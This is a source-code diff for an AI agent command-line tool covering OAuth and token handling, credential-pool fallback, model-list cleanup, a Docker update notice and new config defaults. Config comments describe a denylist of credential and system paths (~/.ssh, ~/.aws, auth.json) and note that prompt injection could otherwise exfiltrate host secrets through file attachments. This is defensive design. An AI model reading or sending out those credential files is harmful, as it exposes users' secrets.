# Upstream rate-limit / usage-quota exhaustion on the token endpoint.
# The stored refresh token is still valid here — re-authenticating
# cannot lift a quota cap. Classify distinctly from auth failures so
# callers surface a "retry later" notice instead of a misleading
# "run hermes auth" prompt (see issue #32790).
retry_after = _parse_retry_after_seconds(getattr(response, "headers", None))
if retry_after is not None:
message = (
f"Codex provider quota exhausted (429); retry after {retry_after}s. "
"Credentials are still valid."
)
else:
message = (
"Codex provider quota exhausted (429). Credentials are still valid; "
"retry after the usage limit resets."
)
raise AuthError(
message,
provider="openai-codex",
code=CODEX_RATE_LIMITED_CODE,
relogin_required=False,
)
if response.status_code != 200:
code = "codex_refresh_failed"
message = f"Codex token refresh failed with status {response.status_code}."
@@ -3410,8 +3585,36 @@ def resolve_codex_runtime_credentials(
refresh_if_expiring: bool = True,
refresh_skew_seconds: int = CODEX_ACCESS_TOKEN_REFRESH_SKEW_SECONDS,
) -> Dict[str, Any]:
"""Resolve runtime credentials from Hermes's own Codex token store."""
data = _read_codex_tokens()
"""Resolve runtime credentials from Hermes's own Codex token store.
Falls back to the credential pool when the singleton (``providers.openai-codex.tokens``)
has no usable access_token but the pool (``credential_pool.openai-codex``) does. This
closes the divergence between the chat path (singleton-only via this function) and
the auxiliary path (pool-first via ``_read_codex_access_token``). Without this
fallback, a user whose tokens live only in the pool for example after a manual
pool seed, a partial re-auth, or pool-only restoration from a backup gets a bare
HTTP 401 ``Missing Authentication header`` from the wire instead of a usable
credential. See issue #32992.
"""
try:
data = _read_codex_tokens()
except AuthError:
pool_token = _pool_codex_access_token()
if pool_token:
base_url = (
os.getenv("HERMES_CODEX_BASE_URL", "").strip().rstrip("/")
or DEFAULT_CODEX_BASE_URL
)
return {
"provider": "openai-codex",
"base_url": base_url,
"api_key": pool_token,
"source": "credential_pool",
"last_refresh": None,
"auth_mode": "chatgpt",
}
raise
tokens = dict(data["tokens"])
access_token = str(tokens.get("access_token", "") or "").strip()
refresh_timeout_seconds = float(os.getenv("HERMES_CODEX_REFRESH_TIMEOUT_SECONDS", "20"))
@@ -3449,6 +3652,46 @@ def resolve_codex_runtime_credentials(
}
def _pool_codex_access_token() -> str:
"""Return the most-recent usable access_token from the openai-codex pool.
Used as a fallback by ``resolve_codex_runtime_credentials`` when the
singleton has no creds. Reads ``credential_pool.openai-codex`` entries
directly from auth.json and picks the first non-empty access_token,
preferring entries that are not currently in an exhaustion cooldown.
Returns ``""`` when no usable entry is found (caller handles by raising
the original AuthError).
"""
try:
with _auth_store_lock():
auth_store = _load_auth_store()
pool = auth_store.get("credential_pool")
if not isinstance(pool, dict):
return ""
entries = pool.get("openai-codex")
if not isinstance(entries, list):
return ""
def _entry_usable(entry: Dict[str, Any]) -> bool:
if not isinstance(entry, dict):
return False
token = entry.get("access_token")
if not isinstance(token, str) or not token.strip():
return False
# Skip entries currently in an exhaustion cooldown window.
reset_at = entry.get("last_error_reset_at")
if isinstance(reset_at, (int, float)) and reset_at > time.time():
return False
return True
for entry in entries:
if _entry_usable(entry):
return str(entry.get("access_token", "")).strip()
except Exception:
logger.debug("Codex pool fallback lookup failed", exc_info=True)
return ""
# =============================================================================
# xAI Grok OAuth — tokens stored in ~/.hermes/auth.json
# =============================================================================
@@ -5437,6 +5680,8 @@ def _empty_nous_auth_status() -> Dict[str, Any]:
"access_expires_at": None,
"agent_key_expires_at": None,
"has_refresh_token": False,
"inference_credential_present": False,
"credential_source": None,
}
@@ -5465,24 +5710,36 @@ def _snapshot_nous_pool_status() -> Dict[str, Any]:
return (agent_exp, access_exp, -priority)
entry = max(entries, key=_entry_sort_key)
access_token = (
getattr(entry, "access_token", None)
or getattr(entry, "runtime_api_key", "")
)
if not access_token:
runtime_key = getattr(entry, "runtime_api_key", None) or getattr(entry, "access_token", "")
if not runtime_key:
return _empty_nous_auth_status()
access_token = getattr(entry, "access_token", None)
auth_type = str(getattr(entry, "auth_type", "") or "").strip().lower()
refresh_token = getattr(entry, "refresh_token", None)
is_portal_oauth = bool(access_token) and (
auth_type.startswith("oauth") or bool(refresh_token)
)
label = getattr(entry, "label", "unknown")
portal_status_url = None
if is_portal_oauth:
portal_status_url = (
getattr(entry, "portal_base_url", None)
or DEFAULT_NOUS_PORTAL_URL
)
return {
"logged_in": True,
"portal_base_url": getattr(entry, "portal_base_url", None)
or getattr(entry, "base_url", None),
"logged_in": is_portal_oauth,
"portal_base_url": portal_status_url,
"inference_base_url": getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None),
"access_token": access_token,
"access_token": access_token if is_portal_oauth else None,
"access_expires_at": getattr(entry, "expires_at", None),
"agent_key_expires_at": getattr(entry, "agent_key_expires_at", None),
"has_refresh_token": bool(getattr(entry, "refresh_token", None)),
"source": f"pool:{getattr(entry, 'label', 'unknown')}",
"has_refresh_token": bool(refresh_token),
"inference_credential_present": True,
"credential_source": f"pool:{label}",
"source": f"pool:{label}",
}
except Exception:
return _empty_nous_auth_status()
@@ -5565,6 +5822,10 @@ def _compute_nous_auth_status() -> Dict[str, Any]:
"agent_key_expires_at": state.get("agent_key_expires_at"),
"has_refresh_token": bool(state.get("refresh_token")),
"access_token": state.get("access_token"),
"inference_credential_present": bool(
state.get("access_token") or state.get("agent_key")
),
"credential_source": "auth_store",
"source": "auth_store",
}
try:
@@ -5582,6 +5843,8 @@ def _compute_nous_auth_status() -> Dict[str, Any]:
or refreshed_state.get("agent_key_expires_at")
or base_status.get("agent_key_expires_at"),
"has_refresh_token": bool(refreshed_state.get("refresh_token")),
"inference_credential_present": True,
"credential_source": "auth_store",
"source": f"runtime:{creds.get('source', 'portal')}",
"key_id": creds.get("key_id"),
}
@@ -6093,6 +6356,7 @@ def _prompt_model_selection(
pricing: Optional[Dict[str, Dict[str, str]]] = None,
unavailable_models: Optional[List[str]] = None,
portal_url: str = "",
unavailable_message: str = "",
) -> Optional[str]:
"""Interactive model selection. Puts current_model first with a marker. Returns chosen model ID or None.
@@ -6184,18 +6448,22 @@ def _prompt_model_selection(
choices.append(" Enter custom model name")
choices.append(" Skip (keep current)")
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
unavailable_footer = unavailable_message.strip()
if not unavailable_footer and _unavailable:
unavailable_footer = f"Upgrade at {_upgrade_url} for paid models"
# Print the unavailable block BEFORE the menu via regular print().
# simple_term_menu pads title lines to terminal width (causes wrapping),
# so we keep the title minimal and use stdout for the static block.
# clear_screen=False means our printed output stays visible above.
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
if _unavailable:
print(menu_title)
print()
for mid in _unavailable:
print(f"{_DIM} {_label(mid)}{_RESET}")
print()
print(f"{_DIM} ── Upgrade at {_upgrade_url} for paid models ──{_RESET}")
print(f"{_DIM} ── {unavailable_footer} ──{_RESET}")
print()
effective_title = "Available free models:"
else:
@@ -6237,8 +6505,11 @@ def _prompt_model_selection(
if _unavailable:
_upgrade_url = (portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
unavailable_footer = unavailable_message.strip() or (
f"Unavailable models (requires paid tier — upgrade at {_upgrade_url})"
)
print()
print(f" {_DIM}── Unavailable models (requires paid tier — upgrade at {_upgrade_url}) ──{_RESET}")
print(f" {_DIM}── {unavailable_footer} ──{_RESET}")
for mid in _unavailable:
print(f" {'':>{num_width}} {_DIM}{_label(mid)}{_RESET}")
print()
@@ -6587,6 +6858,12 @@ def _xai_oauth_loopback_login(
remote VM). The same PKCE verifier, ``state``, and ``nonce`` are
used for both paths so the upstream-side OAuth flow is identical.
"""
def _stdin_supports_manual_paste() -> bool:
try:
return bool(getattr(sys.stdin, "isatty", lambda: False)())
except Exception:
return False
discovery = _xai_oauth_discovery(timeout_seconds)
authorization_endpoint = discovery["authorization_endpoint"]
token_endpoint = discovery["token_endpoint"]
@@ -6650,12 +6927,28 @@ def _xai_oauth_loopback_login(
else:
print("Could not open the browser automatically; use the URL above.")
callback = _xai_wait_for_callback(
server,
thread,
callback_result,
timeout_seconds=max(30.0, timeout_seconds * 9),
)
try:
callback = _xai_wait_for_callback(
server,
thread,
callback_result,
timeout_seconds=max(30.0, timeout_seconds * 9),
)
except AuthError as exc:
if (
getattr(exc, "code", "") != "xai_callback_timeout"
or not _stdin_supports_manual_paste()
):
raise
print()
print("xAI loopback callback timed out.")
print("If your browser reached a failed 127.0.0.1 callback page,")
print("paste that FULL callback URL below to continue this login.")
print("You can also re-run with `--manual-paste` to skip the")
print("loopback listener from the start.")
callback = _prompt_manual_callback_paste(redirect_uri)
if callback.get("code") is None and callback.get("error") is None:
raise exc
except Exception:
try:
server.shutdown()
@@ -6675,7 +6968,21 @@ def _xai_oauth_loopback_login(
provider="xai-oauth",
code="xai_authorization_failed",
)
if callback.get("state") != state:
callback_state = callback.get("state")
# Manual-paste bare-code path: when a user pastes only the opaque
# authorization code (no ``code=``/``state=`` query parameters),
# ``_parse_pasted_callback`` returns ``state=None``. xAI's consent
# page renders the code in-page rather than redirecting through the
# 127.0.0.1 callback, so on many remote setups (Cloud Shell, headless
# VPS, container consoles) the bare code is the only thing the user
# can obtain. PKCE (code_verifier) still binds the exchange to this
# client, so the local state-equality check is redundant on the
# bare-code path — we substitute the locally generated state to keep
# the rest of the validation chain (and the token exchange) unchanged.
# See #26923 (AccursedGalaxy comment, 2026-05-20).
if callback_state is None and manual_paste:
callback_state = state
if callback_state != state:
raise AuthError(
"xAI authorization failed: state mismatch.",
provider="xai-oauth",
@@ -7436,8 +7743,9 @@ def _nous_device_code_login(
portal_url = auth_state.get(
"portal_base_url", DEFAULT_NOUS_PORTAL_URL
).rstrip("/")
message = format_auth_error(exc)
print()
print("Your Nous Portal account does not have an active subscription.")
print(message)
print(f" Subscribe here: {portal_url}/billing")
print()
print("After subscribing, run `hermes model` again to finish setup.")
@@ -7547,11 +7855,30 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
print()
unavailable_models: list = []
unavailable_message = ""
if model_ids:
pricing = get_pricing_for_provider("nous")
free_tier = check_nous_free_tier()
# Force fresh account data for model selection so recent credit
# purchases are reflected immediately.
free_tier = check_nous_free_tier(force_fresh=True)
_portal_for_recs = auth_state.get("portal_base_url", "")
if free_tier:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
_account_info = get_nous_portal_account_info(force_fresh=True)
unavailable_message = (
format_nous_portal_entitlement_message(
_account_info,
capability="paid Nous models",
)
or ""
)
except Exception:
unavailable_message = ""
# The Portal's freeRecommendedModels endpoint is the
# source of truth for what's free *right now*. Augment
# the curated list with anything new the Portal flags
@@ -7578,11 +7905,12 @@ def _login_nous(args, pconfig: ProviderConfig) -> None:
model_ids, pricing=pricing,
unavailable_models=unavailable_models,
portal_url=_portal,
unavailable_message=unavailable_message,
)
elif unavailable_models:
_url = (_portal or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
print("No free models currently available.")
print(f"Upgrade at {_url} to access paid models.")
print(unavailable_message or f"Upgrade at {_url} to access paid models.")
else:
print("No curated models available for Nous Portal.")
except Exception as exc:
+5 -2
View File
@@ -512,6 +512,7 @@ def _quick_snapshot_root(hermes_home: Optional[Path] = None) -> Path:
def create_quick_snapshot(
label: Optional[str] = None,
hermes_home: Optional[Path] = None,
keep: Optional[int] = None,
) -> Optional[str]:
"""Create a quick state snapshot of critical files.
@@ -585,8 +586,10 @@ def create_quick_snapshot(
with open(snap_dir / "manifest.json", "w", encoding="utf-8") as f:
json.dump(meta, f, indent=2)
# Auto-prune
_prune_quick_snapshots(root, keep=_QUICK_DEFAULT_KEEP)
# Auto-prune. Defaults preserve historical manual /snapshot behavior; callers
# with known high-churn safety snapshots (for example pre-update) can pass a
# smaller keep value so large state.db copies do not accumulate indefinitely.
_prune_quick_snapshots(root, keep=_QUICK_DEFAULT_KEEP if keep is None else keep)
logger.info("State snapshot created: %s (%d files)", snap_id, len(manifest))
return snap_id
+29 -1
View File
@@ -300,14 +300,42 @@ def _git_short_hash(repo_dir: Path, rev: str) -> Optional[str]:
def get_git_banner_state(repo_dir: Optional[Path] = None) -> Optional[dict]:
"""Return upstream/local git hashes for the startup banner."""
"""Return upstream/local git hashes for the startup banner.
For source installs and dev images this runs ``git rev-parse`` against
the active checkout. When no checkout is available the canonical case
is the published Docker image, which excludes ``.git`` from the build
context we fall back to the baked-in build SHA (see
``hermes_cli/build_info.py``) and return it as a frozen
``upstream == local`` state with ``ahead=0``. A built image is by
definition pinned to one commit, so "ahead" is always zero and the
banner correctly shows ``· upstream <sha>`` with no carried-commits
annotation.
"""
repo_dir = repo_dir or _resolve_repo_dir()
if repo_dir is None:
# No git checkout — try the baked build SHA (Docker image path).
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
if baked:
return {"upstream": baked, "local": baked, "ahead": 0}
except Exception:
pass
return None
upstream = _git_short_hash(repo_dir, "origin/main")
local = _git_short_hash(repo_dir, "HEAD")
if not upstream or not local:
# Live-git lookup failed (e.g. shallow clone without origin/main).
# Fall back to the baked build SHA if available.
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
if baked:
return {"upstream": baked, "local": baked, "ahead": 0}
except Exception:
pass
return None
ahead = 0
+51
View File
@@ -0,0 +1,51 @@
"""
Baked-in build metadata for Hermes Agent.
Source installs report their git revision live via ``git rev-parse`` (see
``hermes_cli/dump.py`` and ``hermes_cli/banner.py``). That doesn't work inside
the published Docker image because ``.dockerignore`` excludes ``.git``, so
those callsites fall back to ``"(unknown)"`` / drop the banner suffix entirely.
To make ``hermes dump`` and the startup banner identify the exact commit the
image was built from, the Docker build writes the build-time ``$HERMES_GIT_SHA``
arg into ``<project_root>/.hermes_build_sha``. This module is the single
read-side helper consumed by both callsites keeping the lookup in one place
so the file path and missing-file behaviour stay consistent.
Behaviour:
- Returns ``None`` when the file is absent. Source installs and dev images
built without the ``HERMES_GIT_SHA`` build-arg fall through to live-git
resolution in the caller, so non-Docker installs are unaffected.
- Returns ``None`` on any IO / decoding error. The build-sha is a nice-to-have
for support triage; nothing in the CLI is allowed to crash because of it.
- Truncates to ``short`` characters (default 8) to match the format used by
``git rev-parse --short=8`` throughout the codebase.
"""
from __future__ import annotations
from pathlib import Path
from typing import Optional
# Path is resolved relative to this module so it works regardless of cwd —
# matches the pattern used by ``banner._resolve_repo_dir``.
_BUILD_SHA_FILE = Path(__file__).parent.parent / ".hermes_build_sha"
def get_build_sha(short: int = 8) -> Optional[str]:
"""Return the baked-in build SHA, truncated to ``short`` chars, or None.
Reads ``<project_root>/.hermes_build_sha`` if present. The file is
written by the Dockerfile's ``HERMES_GIT_SHA`` build-arg and contains
the full 40-character commit hash on a single line.
"""
try:
if not _BUILD_SHA_FILE.is_file():
return None
sha = _BUILD_SHA_FILE.read_text(encoding="utf-8").strip()
except Exception:
return None
if not sha:
return None
return sha[:short] if short and short > 0 else sha
+15 -7
View File
@@ -29,21 +29,29 @@ DEFAULT_CODEX_MODELS: List[str] = [
# curated fallback so Pro users still see Spark in `/model` when live
# discovery is unavailable (offline first run, transient API failure).
"gpt-5.3-codex-spark",
"gpt-5.2-codex",
"gpt-5.1-codex-max",
"gpt-5.1-codex-mini",
# NOTE: gpt-5.2-codex / gpt-5.1-codex-max / gpt-5.1-codex-mini were
# previously listed here but the chatgpt.com Codex backend returns
# HTTP 400 "The '<model>' model is not supported when using Codex with
# a ChatGPT account." for all three on every ChatGPT Pro account we've
# tested (verified live 2026-05-27). Keeping them in the fallback list
# leaked dead slugs into /model when live discovery was unavailable
# (transient API failure, first-run before refresh) and surfaced HTTP 400
# crashes on selection. The Codex CLI public catalog still references
# these slugs, which is why they survived previously — but those entries
# describe the public OpenAI API, not the OAuth-backed Codex backend
# Hermes uses. Removed here. If OpenAI re-enables them on Codex backend,
# live discovery will pick them up automatically via _fetch_models_from_api.
]
_FORWARD_COMPAT_TEMPLATE_MODELS: List[tuple[str, tuple[str, ...]]] = [
("gpt-5.5", ("gpt-5.4", "gpt-5.4-mini", "gpt-5.3-codex")),
("gpt-5.4-mini", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.4", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.3-codex", ("gpt-5.2-codex",)),
("gpt-5.4-mini", ("gpt-5.3-codex",)),
("gpt-5.4", ("gpt-5.3-codex",)),
# Surface Spark whenever any compatible Codex template is present so
# accounts hitting the live endpoint with an older lineup still see
# Spark in the picker. Backend gates real availability by ChatGPT Pro
# entitlement; Hermes does not.
("gpt-5.3-codex-spark", ("gpt-5.3-codex", "gpt-5.2-codex")),
("gpt-5.3-codex-spark", ("gpt-5.3-codex",)),
]
+3 -1
View File
@@ -63,6 +63,8 @@ class CommandDef:
COMMAND_REGISTRY: list[CommandDef] = [
# Session
CommandDef("start", "Acknowledge platform start pings without a reply", "Session",
gateway_only=True),
CommandDef("new", "Start a new session (fresh session ID + history)", "Session",
aliases=("reset",), args_hint="[name]"),
CommandDef("topic", "Enable or inspect Telegram DM topic sessions", "Session",
@@ -121,7 +123,7 @@ COMMAND_REGISTRY: list[CommandDef] = [
CommandDef("config", "Show current configuration", "Configuration",
cli_only=True),
CommandDef("model", "Switch model for this session", "Configuration",
aliases=("provider",), args_hint="[model] [--provider name] [--global]"),
aliases=("provider",), args_hint="[model] [--provider name] [--global] [--refresh]"),
CommandDef("codex-runtime", "Toggle codex app-server runtime for OpenAI/Codex models",
"Configuration", aliases=("codex_runtime",),
args_hint="[auto|codex_app_server]"),
+152 -19
View File
@@ -345,6 +345,58 @@ def recommended_update_command() -> str:
return recommended_update_command_for_method(method)
# Long-form text for ``hermes update`` / ``--check`` when running inside the
# Docker image. Surfaced by ``cmd_update`` and ``_cmd_update_check`` in
# hermes_cli/main.py; lives here so the wording stays consistent and we
# don't grow two slightly-different copies.
#
# Why this matters:
# - The published image excludes ``.git`` (see .dockerignore), so the
# git-based update path can never succeed inside the container.
# - The pre-existing fallback message ("✗ Not a git repository. Please
# reinstall: curl ... install.sh") is actively misleading inside Docker
# — that script installs a *new* host-side Hermes, it doesn't update
# the running container.
# - The right action is ``docker pull`` + restart the container; this
# helper spells that out, with notes on tag pinning and config
# persistence so users don't get blindsided.
_DOCKER_UPDATE_MESSAGE = """\
``hermes update`` doesn't apply inside the Docker container.
Hermes Agent runs as a published image (nousresearch/hermes-agent), not a
git checkout the container has no working tree to pull into. Update by
pulling a fresh image and restarting your container instead:
docker pull nousresearch/hermes-agent:latest
# then restart whatever started the container, e.g.:
docker compose up -d --force-recreate hermes-agent
# or, for ad-hoc runs, exit the current container and `docker run` again
Verify the new version after restart:
docker run --rm nousresearch/hermes-agent:latest --version
Notes:
If you pinned a specific tag (e.g. ``:v0.14.0``) the ``:latest`` tag
won't move your container — pull the newer tag you actually want, or
switch to ``:latest`` / ``:main`` for rolling updates. See available
tags at https://hub.docker.com/r/nousresearch/hermes-agent/tags
Your config and session history live under ``$HERMES_HOME`` (``/opt/data``
in the container, typically bind-mounted from the host) and persist
across image upgrades re-pulling doesn't lose any state.
Running a fork? Build your own image with this repo's ``Dockerfile``
and replace the ``docker pull`` step with your build/push pipeline."""
def format_docker_update_message() -> str:
"""Return the user-facing message for ``hermes update`` inside Docker.
Centralised so ``cmd_update`` (the apply path) and ``_cmd_update_check``
(the dry-run path) share the same wording. See ``_DOCKER_UPDATE_MESSAGE``
above for the full rationale.
"""
return _DOCKER_UPDATE_MESSAGE
def format_managed_message(action: str = "modify this Hermes installation") -> str:
"""Build a user-facing error for managed installs."""
managed_system = get_managed_system() or "a package manager"
@@ -712,8 +764,7 @@ DEFAULT_CONFIG = {
"singularity_image": "docker://nikolaik/python-nodejs:python3.11-nodejs20",
"modal_image": "nikolaik/python-nodejs:python3.11-nodejs20",
"daytona_image": "nikolaik/python-nodejs:python3.11-nodejs20",
"vercel_runtime": "node24",
# Container resource limits (docker, singularity, modal, daytona, vercel_sandbox — ignored for local/ssh)
# Container resource limits (docker, singularity, modal, daytona — ignored for local/ssh)
"container_cpu": 1,
"container_memory": 5120, # MB (default 5GB)
"container_disk": 51200, # MB (default 50GB)
@@ -1181,6 +1232,44 @@ DEFAULT_CONFIG = {
# Set this to True to re-enable the surfaces with the understanding
# that the numbers are a local lower-bound estimate, not billing.
"show_token_analytics": False,
# OAuth gate configuration (engaged when ``--host`` is set and
# ``--insecure`` is not). The bundled Nous Portal plugin reads
# both keys at startup; they are the canonical surface for these
# settings. Each can be overridden by an environment variable —
# ``HERMES_DASHBOARD_OAUTH_CLIENT_ID`` and
# ``HERMES_DASHBOARD_PORTAL_URL`` respectively — and the env var
# wins when set to a non-empty value. The override path is what
# Fly.io's platform-secret injection uses to push the per-deploy
# client_id at provisioning time without operators needing to
# touch config.yaml. Local dev / non-Fly deploys can set either
# surface; missing values fall through to the plugin's defaults
# (no provider registered when ``client_id`` is empty;
# ``portal_url`` defaults to https://portal.nousresearch.com).
"oauth": {
"client_id": "", # agent:{instance_id} — Portal provisions this
"portal_url": "", # blank → use plugin default (production Portal)
},
# Public URL override (env: ``HERMES_DASHBOARD_PUBLIC_URL``).
# When set, this is the complete authority — scheme + host +
# optional path prefix (e.g. ``https://example.com/hermes``) —
# the OAuth ``redirect_uri`` is built from. Set this for deploys
# behind reverse proxies that don't reliably forward
# ``X-Forwarded-Host`` / ``X-Forwarded-Proto`` / ``X-Forwarded-Prefix``
# (manual nginx setups, on-prem ingresses, custom-domain Fly
# deploys without proper proxy headers). When set,
# ``X-Forwarded-Prefix`` is IGNORED on the OAuth path because
# the operator has declared the public URL — we no longer need
# to guess from proxy headers, and stacking the prefix on top
# would double-prefix the common case where the prefix is
# already baked into ``public_url``. Leave empty to use the
# existing proxy-header reconstruction (the default).
#
# Validation: rejects values without ``http(s)://`` scheme or
# without a host, and any string containing quote / angle /
# whitespace / control characters. A malformed value silently
# falls through to request reconstruction rather than breaking
# the login flow.
"public_url": "",
},
# Privacy settings
@@ -1637,6 +1726,15 @@ DEFAULT_CONFIG = {
# assignee to any installed profile. When unset, falls back to the
# default profile. A task never ends up with assignee=None.
"default_assignee": "",
# Per-profile concurrency cap (#21582). When set to a positive int,
# no single profile can have more than N workers running at once,
# even if the global max_in_progress / max_spawn caps would allow
# it. Tasks blocked this way defer to the next dispatcher tick.
# Unset (None) means "no per-profile cap" — backward-compatible
# with existing installs. Useful for fan-out workflows that would
# otherwise saturate one profile's local model / API quota /
# browser pool while leaving other profiles idle.
"max_in_progress_per_profile": None,
# When true, the kanban dispatcher auto-runs the decomposer on
# tasks that land in Triage (every dispatcher tick). When false,
# decomposition is manual via `hermes kanban decompose <id>` or
@@ -1717,6 +1815,21 @@ DEFAULT_CONFIG = {
# Gateway settings — control how messaging platforms (Telegram, Discord,
# Slack, etc.) deliver agent-produced files as native attachments.
"gateway": {
# When false (default), any file path the agent emits is delivered
# as a native attachment as long as it isn't under the credential /
# system-path denylist (/etc, /proc, ~/.ssh, ~/.aws, ~/.hermes/.env,
# auth.json, etc.). This matches the symmetry of inbound delivery
# — we accept any document type the user uploads, and the agent
# can hand back any file that isn't a credential.
#
# When true, fall back to the older allowlist+recency-window
# behavior: files must live under the Hermes cache, under
# ``media_delivery_allow_dirs``, or be freshly produced inside the
# ``trust_recent_files_seconds`` window. Recommended for
# public-facing gateways where prompt injection from one user
# shouldn't be able to exfiltrate the host's secrets to that same
# user. Bridged to HERMES_MEDIA_DELIVERY_STRICT.
"strict": False,
# Extra directories from which model-emitted bare file paths may be
# uploaded as native gateway attachments. Files inside the Hermes
# cache (~/.hermes/cache/{documents,images,audio,video,screenshots})
@@ -1724,7 +1837,7 @@ DEFAULT_CONFIG = {
# (project dirs, scratch dirs, mounted shares). Accepts a list of
# absolute paths or a single os.pathsep-separated string. Bridged
# to HERMES_MEDIA_ALLOW_DIRS at gateway startup. Tilde paths are
# expanded.
# expanded. Honored in both default and strict mode.
"media_delivery_allow_dirs": [],
# When true, files whose mtime is within ``trust_recent_files_seconds``
# of "now" are trusted for native delivery even outside the cache /
@@ -1732,10 +1845,12 @@ DEFAULT_CONFIG = {
# PDFs the agent writes into a working directory. System paths
# (/etc, /proc, ~/.ssh, ~/.aws, etc.) remain blocked regardless.
# Disable to fall back to pure-allowlist mode. Bridged to
# HERMES_MEDIA_TRUST_RECENT_FILES.
# HERMES_MEDIA_TRUST_RECENT_FILES. Only consulted when ``strict``
# is true; in default mode the denylist alone gates delivery.
"trust_recent_files": True,
# Recency window in seconds. 600 (10 min) comfortably covers a
# multi-tool agent turn. Bridged to HERMES_MEDIA_TRUST_RECENT_SECONDS.
# Only consulted when ``strict`` is true.
"trust_recent_files_seconds": 600,
},
@@ -1905,13 +2020,25 @@ DEFAULT_CONFIG = {
},
# Paste collapse thresholds (TUI + CLI).
# collapse_threshold: paste collapses to a file reference when line count
# exceeds this value (bracketed paste, safe: appends to existing text).
# collapse_threshold_fallback: same but for the fallback heuristic used
# by terminals without bracketed paste support (destructive: replaces
# entire buffer). 0 = disabled.
#
# paste_collapse_threshold (default 5)
# Bracketed-paste handler. Pastes with this many newlines or more
# collapse to a file reference. Set 0 to disable.
#
# paste_collapse_threshold_fallback (default 5)
# Fallback heuristic for terminals without bracketed paste support.
# Same line count test but heuristically gated by chars-added /
# newlines-added to avoid false positives from normal typing.
# Set 0 to disable.
#
# paste_collapse_char_threshold (default 2000)
# Long single-line paste guard. Pastes whose total char length
# reaches this value collapse to a file reference even if line
# count is below the line threshold. Catches the "8000 chars of
# minified JSON / log output on one line" case. Set 0 to disable.
"paste_collapse_threshold": 5,
"paste_collapse_threshold_fallback": 0,
"paste_collapse_threshold_fallback": 5,
"paste_collapse_char_threshold": 2000,
# Config schema version - bump this when adding new required fields
@@ -2404,10 +2531,10 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"TAVILY_API_KEY": {
"description": "Tavily API key for AI-native web search, extract, and crawl",
"description": "Tavily API key for AI-native web search and extract",
"prompt": "Tavily API key",
"url": "https://app.tavily.com/home",
"tools": ["web_search", "web_extract", "web_crawl"],
"tools": ["web_search", "web_extract"],
"password": True,
"category": "tool",
},
@@ -2483,6 +2610,14 @@ OPTIONAL_ENV_VARS = {
"password": True,
"category": "tool",
},
"KREA_API_KEY": {
"description": "Krea API key for Krea 2 image generation (Medium + Large)",
"prompt": "Krea API key",
"url": "https://www.krea.ai/settings/api-tokens",
"tools": ["image_generate"],
"password": True,
"category": "tool",
},
"VOICE_TOOLS_OPENAI_KEY": {
"description": "OpenAI API key for voice transcription (Whisper) and OpenAI TTS",
"prompt": "OpenAI API Key (for Whisper STT + TTS)",
@@ -2883,8 +3018,8 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_KEY": {
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
"prompt": "API server auth key (required for network access)",
"description": "Bearer token for API server authentication. Required whenever the API server is enabled; server refuses to start without it.",
"prompt": "API server auth key",
"url": None,
"password": True,
"category": "messaging",
@@ -2899,7 +3034,7 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_HOST": {
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
"description": "Host/bind address for the API server (default: 127.0.0.1). API_SERVER_KEY is still required even on loopback binds.",
"prompt": "API server host",
"url": None,
"password": False,
@@ -5227,9 +5362,6 @@ def show_config():
print(f" Daytona image: {terminal.get('daytona_image', 'nikolaik/python-nodejs:python3.11-nodejs20')}")
daytona_key = get_env_value('DAYTONA_API_KEY')
print(f" API key: {'configured' if daytona_key else '(not set)'}")
elif terminal.get('backend') == 'vercel_sandbox':
print(f" Vercel runtime: {terminal.get('vercel_runtime', 'node24')}")
print(f" Vercel auth: {'configured' if get_env_value('VERCEL_OIDC_TOKEN') or (get_env_value('VERCEL_TOKEN') and get_env_value('VERCEL_PROJECT_ID') and get_env_value('VERCEL_TEAM_ID')) else '(not set)'}")
elif terminal.get('backend') == 'ssh':
ssh_host = get_env_value('TERMINAL_SSH_HOST')
ssh_user = get_env_value('TERMINAL_SSH_USER')
@@ -5426,9 +5558,10 @@ def set_config_value(key: str, value: str):
"terminal.singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"terminal.modal_image": "TERMINAL_MODAL_IMAGE",
"terminal.daytona_image": "TERMINAL_DAYTONA_IMAGE",
"terminal.vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
"terminal.docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"terminal.docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"terminal.docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"terminal.docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"terminal.docker_env": "TERMINAL_DOCKER_ENV",
# terminal.cwd intentionally excluded — CLI resolves at runtime,
# gateway bridges it in gateway/run.py. Persisting to .env causes
+40
View File
@@ -0,0 +1,40 @@
"""Dashboard authentication provider framework.
The dashboard auth gate engages only when the dashboard binds to a
non-loopback host without ``--insecure``. In that mode, every request must
carry a verified session from one of the registered ``DashboardAuthProvider``
plugins.
The Nous provider lives in ``plugins/dashboard-auth-nous/`` and is the
default. Third parties register their own providers via the plugin hook
``ctx.register_dashboard_auth_provider``.
"""
from hermes_cli.dashboard_auth.base import (
DashboardAuthProvider,
Session,
LoginStart,
InvalidCodeError,
ProviderError,
RefreshExpiredError,
assert_protocol_compliance,
)
from hermes_cli.dashboard_auth.registry import (
register_provider,
get_provider,
list_providers,
clear_providers,
)
__all__ = [
"DashboardAuthProvider",
"Session",
"LoginStart",
